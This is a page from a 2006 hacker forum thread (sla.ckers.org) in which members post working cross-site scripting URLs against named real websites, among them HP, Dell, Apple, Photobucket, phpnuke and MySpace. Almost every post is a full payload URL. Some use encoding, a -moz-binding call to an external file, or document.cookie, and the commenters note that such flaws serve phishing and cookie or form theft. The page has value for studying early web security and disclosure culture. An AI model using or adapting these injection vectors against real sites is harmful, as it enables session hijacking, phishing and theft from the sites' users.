Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: Previous1234567891011...LastNext
Current Page: 2 of 65
Re: So it begins
Posted by: digi7al64
Date: September 07, 2006 12:14AM

http://www.ninjaproxy.com/cgiproxy/nph-proxy.pl/010110A/"<script>alert('boo')</script>

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: So it begins
Posted by: kefka
Date: September 07, 2006 04:21PM

http://h20000.www2.hp.com/bizsupport/TechSupport/ProdSearch.jsp?lang=en&cc=us&taskId=135&prod=%22%3E%3CSCRIPT%3Ealert(%22kefka%20was%20here%22)%3C/SCRIPT%3E

Options: ReplyQuote
Re: So it begins
Posted by: WhiteAcid
Date: September 08, 2006 02:42PM

http://www.nanoy.org/50XSS.txt <-- list of 101 XSS flaws
Though I haven't tested any.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 10, 2006 01:10PM

http://www.animenfo.com/search.php?query=%22%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E%3Cb+%22&queryin=anime_titles&action=Go&option=keywords

http://www.manga-news.com/recherche.php3?recherche=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E

http://www.tokyopop.com/search.php?query=%22%3Cscript%3Ealert('XSS')%3C/script%3E%22

http://anidb.info/perl-bin/animedb.pl?show=animelist&adb.search=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&do.search=search

http://animefringe.com/search/index.php?REQ=%3Cscript%3Ealert('XSS')%3C/script%3E

http://www.darkhorse.com/search/search.php?frompage=userINPUT&sstring=maluc+%3CBODY+onload%3Dalert%28%22XSS%22%29%3E&match=any&scope=all&type=all&startmonth=all&startyear=all&endmonth=all&endyear=all&genre=all

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://us.yesasia.com/en/Search/SearchResult.aspx&asKeyword=%3Cscript%3Ealert('XSS')%3C/script%3E&asSectionID=allproducts&asIncludeOutOfStock=1&asShowAdult=0&mode=simplesearch <-- actually yesasia.com, thanks for the script whiteacid ^^

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.advfilms.com/search.asp&search=<script>alert(String.fromCharCode(88,83,83))</script> <--this ones advfilms.com

http://www.jlist.com/SEARCH/%3Cbody_onload=alert('XSS')%3E/1/

http://www.totalvid.com/searchResultsBlinkx.cfm?blnFailed=1&strSearch=%3C/title%3E%3Cscript%3Ealert('XSS')%3C/script%3E

just a bunch of nonpersistant XSS, mostly unfiltered.. was in an anime mood if you can't tell.

-maluc



Edited 3 time(s). Last edit at 09/11/2006 03:01AM by maluc.

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 11, 2006 05:45AM

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://phpnuke.org/modules.php?name=Search&query=%22%20style=%22-moz-binding:url('http://ha.ckers.org/xssmoz.xml%23xss')&

actually phpnuke.org .. parameter embedded style tag, but works only with firefox

can use events like mouseover too, which will work with IE .. but this way requires no user assistance ^^

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: WhiteAcid
Date: September 11, 2006 06:06AM

Every time I see [whiteacid.org] I get a huge lump in my throat, then I read what it actually is. Gets me every time :p

Good one finding one on phpnuke though.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 11, 2006 06:18AM

http://www.hotscripts.com/search/index.html?command=do_search_mm&query=%22><script>alert('XSS%20-%20%73%74%61%79%73%20%70%65%72%73%69%73%74%61%6E%74%20%66%6F%72%20%6C%69%66%65%20%6F%66%20%63%6F%6F%6B%69%65%73%2F%73%65%73%73%69%64');</script><b%20%22

this oddly enough stays persistant for the life of the PHPSESSID cookie .. even when opening a new window - until its replaced by a new search anyway

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 11, 2006 07:18AM

http://docs.phplivesupport.com/search.php?uid=1&searcht=%22%3E%3Cscript%3Ealert%28%27Its+past+7am%2C+I+am+tired.%27%29%3C%2Fscript%3E%3Cb+%22&submit1=

I need to sleep ..

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 11, 2006 11:19AM

Wow, maluc, look at you go! Don't burn yourself out! :)

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 11, 2006 11:15PM

lol .. well nonpersistent XSS are a dime a dozen, can post them all day long..


and while it's correct to say they're not as volatile as persistent ones, they're still equally useful for phishing and cookie/form theft.

still though, i find that the persistent ones tend to have many more possibilities, and on juicier sites to boot..

for example: http://www.myspace.com/malucracker allows persistant XSS from quicktime javascript injection, thanks to pdp for pointing that out on gnucitizen.org

and while i'm at it, another persistant one in the file hoster http://s12.quicksharing.com/v/4813729/xssmaluc.mov.html which does no filtering of the Description field when uploading..

The scariest thing about persistant ones is that links have no indication that it could be malicious (i.e. long hex encoded string) and by the time you can check, it's already too late. Fortunately, (or unfortunately depending on which side of the fence you sit :insert blackhat emoticon: ) these are much less common, but that by no means implies they're rare..

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: yawnmoth
Date: September 12, 2006 09:15AM

Persistant ones can also usually propogate themselves whereas reflected ones can't.

eg. the quicksharing.com one can make people upload an image that contains an identical xss (that might appear in a "recently uploaded" section or something) whereas with reflected xss, the most you can do is, i dunno... generate a new URL that no one's likely to view, anyway?



Edited 1 time(s). Last edit at 09/12/2006 09:20AM by yawnmoth.

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 12, 2006 12:34PM

Reflected can propogate, as long as you can store the string that allows you to run the XSS. For instance, me having an <A HREF=http://... tag that points to an XSS doesn't mean the tag is vulnerable, it means the function it's pointing to is vulnerable. That vulnerable function can save a link, and that link can be used again. I know that mostly seems like persistant, but it's only persistant in that the link to the vector itself is persistant. For instance if I say "click here" and people click on it, that doesn't mean that it's persistant, but yet it did propagate to those users. If they then insert links elsewhere that say "click here" the link again is not the vector, but the function it lands you on contains the string that is vulnerable. Maybe this is academic and not particularly interesting though.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 19, 2006 10:56AM

https://forums.there.com/forums/login.pl?redirect=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 19, 2006 11:58PM

http://proxy.perlproxy.com/p/000110A0000000/%3Cscript%3Ealert('XSS')%3C/script%3E

I feel really bad about this one because I think this is an interesting and useful service... But it _is_ designed not to allow this so....

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 20, 2006 12:18AM

http://photobucket.com/feedback.php?action=contact&email=asdf&subject=&feedback=%3C/textarea%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&send=Send

Had to break out of a textarea on this one. This is something I haven't mentioned on the XSS cheat sheat much (mentioned it in context of title tags, but not textareas).

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 20, 2006 10:18AM

ah, nice find .. and ya, i see it happen with title tags fairly often. i'll have to keep variables involving textareas in mind, because those 'email a friend' forms are pretty common on websites - and usually autofill in atleast one field.

And although this one is from an <input> tag .. i found it because of the email form idea _-_ http://www.yousendit.com/resend_activate.php?email=shameless%20plug:%20%6D%61%6C%75%63%2E%73%69%74%65%73%6C%65%64%2E%63%6F%6D%22%20%3E%3Cscript%3Ealert('XSS')%3C/script><b%20

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 20, 2006 12:37PM

Dude, you're getting a http://accessories.us.dell.com/sna/category.aspx?k=%22%3e%3Cscript%3Ealert('XSS')%3C/script%3E&_nks=true&c=us&cs=19&l=en&s=dhs&x=0&y=0

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 20, 2006 12:43PM

http://www.pcworld.com/search/results?qt=%22onmouseover=%22alert('XSS')%22

Have to mouse over some of the links on top.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 20, 2006 01:25PM

http://www.netdisaster.com/go.php?mode=cow&url=http://www.google.com/?%22onmouseover=alert(String.fromCharCode(88,83,83))%20;//

Another mouseover one.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: kirke
Date: September 20, 2006 02:21PM

just HTML injection, but funny anyway

http://devcentral.f5.com/Default.aspx?tabid=29&error=Lorem+ipsum+dolor+sit+amet,+consectetur+adipisicing+elit,+sed+do+eiusmod+tempor+incididunt+ut+labore+et+dolore+magna+aliqua.+Ut+enim+ad+minim+veniam,+quis+nostr%20ud+exercitation+ullamco+laboris+nisi+ut+aliquip+ex+ea+commodo+consequat.+Duis+aute+irure+dolor+in+reprehenderit+in+voluptate+velit+esse+cillum+dolore+eu+fugiat+nulla+pariatur.+Excepteur+sint+occaecat+cupidatat+non+proident,+sunt+in+culpa+qui+officia+deserunt+mollit+anim+id+est+laborum.

Options: ReplyQuote
Re: So it begins
Posted by: kirke
Date: September 20, 2006 02:37PM

unescaped, somehow ...

http://support.acunetix.com/index.php?form_submit=register_confirm&mod_id=7&register_email=foo&register_code=%22%3E%3Cscript%3Ealert(unescape(%33)%2bunescape(%31)%2bunescape(%33)%2bunescape(%33)%2bunescape(%37))%3C/script%3E%3Cx%22

Options: ReplyQuote
Re: So it begins
Posted by: yawnmoth
Date: September 20, 2006 03:03PM

rsnake Wrote:
-------------------------------------------------------
> http://www.netdisaster.com/go.php?mode=cow&url=htt
> p://www.google.com/?%22onmouseover=alert(String.fr
> omCharCode(88,83,83))%20;//
>
> Another mouseover one.


Any reason, in particular, why you're not doing -moz-binding or using a CSS expression, instead? They may only work in one browser, but they don't require any user intervention, whereas onmouseover does..

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 20, 2006 03:05PM

I tried it, but it didn't allow "http://" and I didn't want to bother trying to figure a way around it. ;) Laziness my friend, sheer laziness. :)

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 20, 2006 05:43PM

iHack (apple.com): http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://searchcgi.apple.com/cgi-bin/sp/nph-searchpre11.pl&site=us_only&oe=utf-8&access=p&q=--%3E%3Cscript%3Ealert('XSS')%3C%2Fscript%3E+ipod&btnG=Search

- RSnake
Gotta love it. http://ha.ckers.org



Edited 1 time(s). Last edit at 09/20/2006 05:54PM by rsnake.

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: September 20, 2006 07:06PM

Interestingly, that one doesn't work in Opera, rsnake.

- Kyran

Options: ReplyQuote
Re: So it begins
Posted by: raif
Date: September 20, 2006 09:22PM

http://www.dohistory.org/cgi-bin/htsearch?config=dohistory&restrict=&exclude=&words=bla</title><script>alert('xss')</script><title>&method=and&format=builtin-long&sort=score

http://www.the-dma.org/cgi2/htsearch?config=the-dmahtdigwhole&restrict=&words='</title><script>alert('xss')</script><title>&method=and

http://www.sciencemag.org/cgi/search?src=hw&site_area=sci&fulltext=</title><script>alert('xss')</script>

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.exa.com.au/exasearch/index.php&s=foobar<script>alert(document.cookie)</script>

oddly enough, those first 3 pages do seem to change the angle brackets into the proper &lt; and &gt; in the body, but not in the title tag. and that last one is a web design company, lol



Edited 2 time(s). Last edit at 09/20/2006 09:38PM by raif.

Options: ReplyQuote
Re: So it begins
Posted by: WhiteAcid
Date: September 20, 2006 09:24PM

Didn't work in firefox for me either, I presume they fixed the flaw.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: September 20, 2006 09:38PM

I tested it in IE and it worked.

- Kyran

Options: ReplyQuote
Re: So it begins
Posted by: Sparky
Date: September 20, 2006 11:54PM

Also works in Safari ...

Options: ReplyQuote
Re: So it begins
Posted by: id
Date: September 21, 2006 12:14AM

The one burning question I have is...

WHY THE FUCK ARE YOU ON HALF THESE SITES?

"A site that shows you how to piece together the past from the fragments that have survived. Our case study: Martha Ballard."

"A midwife's tale, the book"

What were you doing that led you here? Grandma, is that you? Who let you on the internet?

-id

Options: ReplyQuote
Pages: Previous1234567891011...LastNext
Current Page: 2 of 65


Sorry, only registered users may post in this forum.